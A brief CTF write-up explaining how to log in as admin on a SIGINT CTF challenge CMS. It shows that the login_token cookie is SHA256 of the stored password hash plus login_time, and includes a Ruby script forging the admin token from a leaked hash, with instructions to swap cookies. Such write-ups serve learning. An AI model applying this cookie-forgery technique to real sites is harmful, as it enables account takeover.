Another challenge from SIGINT CTF. The organizers give to us the sourecode of this little CMS where, after a registration, you can create a message that only you and the admin can see. The aim of this one was to login as admin and read his secret (flag). After login with mine account I see that 3 cookies has been created: login_time, login_token and login_name. Well, login_time is as self-explanatory as login_name but login_token isn’t. This is a piece of code that may help you to understand how it is generated:

web.ru

login_token= user.login_token(login_time)

user.rb

def login_token(salt)
    check_authorized
    password_data= Data.new(@user_dir+"password_hash")
    password_data.readlock do
        Digest::SHA256.hexdigest(password_data.read+salt)
    end
end

So logintoken take the the time has seed. In _login_token function we see another variable initialized that is password_data. As you may understand its a file (source/data/users//password_hash) containing a string: $2a$13$ntsVS46ekclCQRIO45a1oOgpZy6asmxAfP0ko3d8G4H1LsGVcEQ0O

This one is from admin user that concatenated with the salt(login_time) and SHA256’d gives the login_token. So generating one that fit to admin is extremely easy. Just took the good login_time from your cookies after logged in with your account and put it in this piece of code:

#!/usr/bin/ruby

require "digest"
password_data="$2a$13$ntsVS46ekclCQRIO45a1oOgpZy6asmxAfP0ko3d8G4H1LsGVcEQ0O"
salt="1373119012"
login_token = Digest::SHA256.hexdigest(password_data+salt)
puts login_token

and it will give you the login_token. Now replace it with the older one setting login_name as admin and you’ll be him.

Razor4x